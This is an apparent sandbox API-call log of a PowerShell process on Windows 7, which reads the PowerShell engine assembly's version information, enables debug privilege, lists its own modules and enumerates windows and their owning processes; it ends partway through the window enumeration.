	[0375.531] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x26db10 | out: lpFileInformation=0x26db10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0375.532] SetErrorMode (uMode=0x1) returned 0x1
	[0375.535] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x26dd80 | out: lpdwHandle=0x26dd80) returned 0x94c
	[0375.537] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2e572d8 | out: lpData=0x2e572d8) returned 1
	[0375.539] VerQueryValueW (in: pBlock=0x2e572d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x26dcf8, puLen=0x26dcf0 | out: lplpBuffer=0x26dcf8*=0x2e57374, puLen=0x26dcf0) returned 1
	[0375.542] lstrlenW (lpString="䅁") returned 1
	[0375.551] VerQueryValueW (in: pBlock=0x2e572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x26dc68, puLen=0x26dc60 | out: lplpBuffer=0x26dc68*=0x2e57450, puLen=0x26dc60) returned 1
	[0375.551] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0375.553] CoTaskMemAlloc (cb=0x2e) returned 0x471bb0
	[0375.553] lstrcpyW (in: lpString1=0x471bb0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0375.555] CoTaskMemFree (pv=0x471bb0) 
	[0375.555] VerQueryValueW (in: pBlock=0x2e572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x26dc68, puLen=0x26dc60 | out: lplpBuffer=0x26dc68*=0x2e574a4, puLen=0x26dc60) returned 1
	[0375.555] lstrlenW (lpString="System.Management.Automation") returned 28
	[0375.555] CoTaskMemAlloc (cb=0x3c) returned 0x40ebd0
	[0375.555] lstrcpyW (in: lpString1=0x40ebd0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0375.555] CoTaskMemFree (pv=0x40ebd0) 
	[0375.555] VerQueryValueW (in: pBlock=0x2e572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x26dc68, puLen=0x26dc60 | out: lplpBuffer=0x26dc68*=0x2e57500, puLen=0x26dc60) returned 1
	[0375.555] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0375.555] CoTaskMemAlloc (cb=0x20) returned 0x4747c0
	[0375.555] lstrcpyW (in: lpString1=0x4747c0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0375.555] CoTaskMemFree (pv=0x4747c0) 
	[0375.555] VerQueryValueW (in: pBlock=0x2e572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x26dc68, puLen=0x26dc60 | out: lplpBuffer=0x26dc68*=0x2e57540, puLen=0x26dc60) returned 1
	[0375.555] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0375.555] CoTaskMemAlloc (cb=0x44) returned 0x40ebd0
	[0375.555] lstrcpyW (in: lpString1=0x40ebd0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0375.555] CoTaskMemFree (pv=0x40ebd0) 
	[0375.556] VerQueryValueW (in: pBlock=0x2e572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x26dc68, puLen=0x26dc60 | out: lplpBuffer=0x26dc68*=0x2e575a8, puLen=0x26dc60) returned 1
	[0375.556] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0375.556] CoTaskMemAlloc (cb=0x76) returned 0x425050
	[0375.556] lstrcpyW (in: lpString1=0x425050, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0375.556] CoTaskMemFree (pv=0x425050) 
	[0375.556] VerQueryValueW (in: pBlock=0x2e572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x26dc68, puLen=0x26dc60 | out: lplpBuffer=0x26dc68*=0x2e57644, puLen=0x26dc60) returned 1
	[0375.556] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0375.556] CoTaskMemAlloc (cb=0x44) returned 0x40ebd0
	[0375.556] lstrcpyW (in: lpString1=0x40ebd0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0375.556] CoTaskMemFree (pv=0x40ebd0) 
	[0375.556] VerQueryValueW (in: pBlock=0x2e572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x26dc68, puLen=0x26dc60 | out: lplpBuffer=0x26dc68*=0x2e576a8, puLen=0x26dc60) returned 1
	[0375.556] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0375.556] CoTaskMemAlloc (cb=0x58) returned 0x442120
	[0375.556] lstrcpyW (in: lpString1=0x442120, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0375.556] CoTaskMemFree (pv=0x442120) 
	[0375.556] VerQueryValueW (in: pBlock=0x2e572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x26dc68, puLen=0x26dc60 | out: lplpBuffer=0x26dc68*=0x2e57724, puLen=0x26dc60) returned 1
	[0375.556] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0375.556] CoTaskMemAlloc (cb=0x20) returned 0x4747c0
	[0375.556] lstrcpyW (in: lpString1=0x4747c0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0375.557] CoTaskMemFree (pv=0x4747c0) 
	[0375.557] VerQueryValueW (in: pBlock=0x2e572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x26dc68, puLen=0x26dc60 | out: lplpBuffer=0x26dc68*=0x2e573cc, puLen=0x26dc60) returned 1
	[0375.557] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0375.557] CoTaskMemAlloc (cb=0x66) returned 0x3c96b0
	[0375.557] lstrcpyW (in: lpString1=0x3c96b0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0375.557] CoTaskMemFree (pv=0x3c96b0) 
	[0375.557] VerQueryValueW (in: pBlock=0x2e572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x26dc68, puLen=0x26dc60 | out: lplpBuffer=0x26dc68*=0x0, puLen=0x26dc60) returned 0
	[0375.557] VerQueryValueW (in: pBlock=0x2e572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x26dc68, puLen=0x26dc60 | out: lplpBuffer=0x26dc68*=0x0, puLen=0x26dc60) returned 0
	[0375.557] VerQueryValueW (in: pBlock=0x2e572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x26dc68, puLen=0x26dc60 | out: lplpBuffer=0x26dc68*=0x0, puLen=0x26dc60) returned 0
	[0375.557] VerQueryValueW (in: pBlock=0x2e572d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x26dc38, puLen=0x26dc30 | out: lplpBuffer=0x26dc38*=0x2e57374, puLen=0x26dc30) returned 1
	[0376.147] CoTaskMemAlloc (cb=0x204) returned 0x41ea30
	[0376.147] VerLanguageNameW (in: wLang=0x0, szLang=0x41ea30, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0376.148] CoTaskMemFree (pv=0x41ea30) 
	[0376.149] VerQueryValueW (in: pBlock=0x2e572d8, lpSubBlock="\\", lplpBuffer=0x26dc88, puLen=0x26dc80 | out: lplpBuffer=0x26dc88*=0x2e57300, puLen=0x26dc80) returned 1
	[0376.154] GetCurrentProcessId () returned 0x324
	[0376.169] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x26cbb0 | out: lpLuid=0x26cbb0*(LowPart=0x14, HighPart=0)) returned 1
	[0376.172] GetCurrentProcess () returned 0xffffffffffffffff
	[0376.173] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x26cbd0 | out: TokenHandle=0x26cbd0*=0x2e8) returned 1
	[0376.174] AdjustTokenPrivileges (in: TokenHandle=0x2e8, DisableAllPrivileges=0, NewState=0x2e5ab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0376.175] CloseHandle (hObject=0x2e8) returned 1
	[0376.179] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x324) returned 0x2e8
	[0376.672] EnumProcessModules (in: hProcess=0x2e8, lphModule=0x2e5abb8, cb=0x200, lpcbNeeded=0x26dbe8 | out: lphModule=0x2e5abb8, lpcbNeeded=0x26dbe8) returned 1
	[0376.674] GetModuleInformation (in: hProcess=0x2e8, hModule=0x13f370000, lpmodinfo=0x2e5ae28, cb=0x18 | out: lpmodinfo=0x2e5ae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0376.675] CoTaskMemAlloc (cb=0x804) returned 0x476490
	[0376.675] GetModuleBaseNameW (in: hProcess=0x2e8, hModule=0x13f370000, lpBaseName=0x476490, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0376.676] CoTaskMemFree (pv=0x476490) 
	[0376.676] CoTaskMemAlloc (cb=0x804) returned 0x476490
	[0376.676] GetModuleFileNameExW (in: hProcess=0x2e8, hModule=0x13f370000, lpFilename=0x476490, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0376.677] CoTaskMemFree (pv=0x476490) 
	[0376.677] CloseHandle (hObject=0x2e8) returned 1
	[0376.685] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x324) returned 0x2e8
	[0376.686] GetExitCodeProcess (in: hProcess=0x2e8, lpExitCode=0x26dd18 | out: lpExitCode=0x26dd18*=0x103) returned 1
	[0376.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12e5b088, Length=0x20000, ResultLength=0x26dce0 | out: SystemInformation=0x12e5b088, ResultLength=0x26dce0*=0x20220) returned 0xc0000004
	[0376.696] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12e7b0b8, Length=0x22a20, ResultLength=0x26dce0 | out: SystemInformation=0x12e7b0b8, ResultLength=0x26dce0*=0x20220) returned 0x0
	[0376.710] EnumWindows (lpEnumFunc=0x2b166ac, lParam=0x0) returned 1
	[0377.979] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x4d0
	[0377.979] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x558
	[0377.979] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x4d0
	[0377.979] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x4d0
	[0377.980] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x4d0
	[0377.980] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x538
	[0377.980] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x4d0
	[0377.980] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x778
	[0377.980] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x778
	[0377.980] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x4d0
	[0377.980] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x4d0
	[0377.980] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x4d0
	[0377.981] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x4d0
	[0377.981] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x4d0
	[0377.981] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x4d0
	[0377.981] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x4d0
	[0377.981] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x4d0
	[0377.981] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x460
	[0377.981] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x4d0
	[0377.981] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x4d0
	[0377.982] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x11c4
	[0377.982] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x11b0
	[0377.982] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x1188
	[0377.982] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x1148
	[0377.982] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x1160
	[0377.982] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x10fc
	[0377.982] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xe34
	[0377.982] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xea4
	[0377.983] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x514
	[0377.983] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xe48
	[0377.983] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xbc8
	[0377.983] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xdf8
	[0377.983] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x318
	[0377.983] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xcac
	[0377.983] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x8bc
	[0377.983] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xf9c
	[0377.983] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xf48
	[0377.984] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xe40
	[0377.984] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xecc
	[0377.984] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xeb8
	[0377.984] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xe80
	[0377.984] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xe98
	[0377.984] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xe60
	[0377.984] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xee4
	[0377.984] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xf00
	[0377.985] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xdf0
	[0377.985] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xe1c
	[0377.985] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xdd0
	[0377.985] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xd94
	[0377.985] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xd74
	[0377.985] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xd00
	[0377.985] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xcd8
	[0377.985] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xc84
	[0377.986] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xca4
	[0377.986] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xc64
	[0377.986] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xc24
	[0377.986] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xb84
	[0377.986] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xbac
	[0377.986] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x384
	[0377.986] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xab8
	[0377.986] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x33c
	[0377.987] GetWindow (hWnd=0x102da, uCmd=0x4) returned 0x0
	[0377.988] IsWindowVisible (hWnd=0x102da) returned 0
	[0377.988] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xa44
	[0377.988] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xa64
	[0377.988] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x8a8
	[0377.989] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xaf0
	[0377.989] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x88c
	[0377.989] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xb04
	[0377.989] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x910
	[0377.989] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x230
	[0377.989] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xac0
	[0377.989] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xab4
	[0377.989] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xaac
	[0377.990] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x3d0
	[0377.990] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x978
	[0377.990] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xa7c
	[0377.990] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x59c
	[0377.990] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xa88
	[0377.990] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xa6c
	[0377.990] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xa68
	[0377.990] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x9f8
	[0377.991] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xa04
	[0377.991] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x924
	[0377.991] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x8dc
	[0377.991] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x7dc
	[0377.991] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x768
	[0377.991] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x764
	[0377.991] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x820
	[0377.991] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x810
	[0377.991] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x794
	[0377.991] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x83c
	[0377.992] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x7ac
	[0377.992] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xb44
	[0377.992] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xb5c
	[0377.992] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x838
	[0377.992] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x4d0
	[0377.992] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x4d0
	[0377.992] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x4d0
	[0377.992] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x4d0
	[0377.992] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x4d0
	[0377.993] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x4d0
	[0377.993] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x4d0
	[0377.993] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x4d0
	[0377.993] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x818
	[0377.993] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x5b8
	[0377.993] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x494
	[0377.993] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x1ec
	[0377.993] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x440
	[0377.994] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x7e8
	[0377.994] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x730
	[0377.994] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x2c8
	[0377.994] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x31c
	[0377.994] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x330
	[0377.994] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x128
	[0377.994] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x5c8
	[0377.994] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x6f8
	[0377.994] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x358
	[0377.994] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0x73c
	[0377.994] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x26da40 | out: lpdwProcessId=0x26da40) returned 0xb0
